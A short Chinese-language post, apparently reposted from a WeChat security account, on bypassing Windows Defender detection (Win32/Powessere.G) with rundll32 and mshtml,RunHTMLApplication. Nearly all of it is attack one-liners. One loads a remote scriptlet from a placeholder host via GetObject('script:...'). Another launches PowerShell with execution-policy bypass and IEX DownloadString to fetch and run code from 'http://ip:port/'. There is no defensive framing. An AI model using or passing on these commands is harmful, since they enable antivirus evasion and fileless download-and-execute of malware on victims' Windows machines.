绕过 Windows Defender 木马:Win32/Powessere.G
C: > rundll32.exe javascript:" ...... mshtml,RunHTMLApplication ";alert (666)
C: > rundll32.exe javascript:" ...... mshtml,RunHTMLApplication ";document.write () ;GetObject ("script"+":"+"http :// xxxx/hi.tmp")
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("http://WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
原文始发于微信公众号(Khan安全攻防实验室):绕过 Windows Defender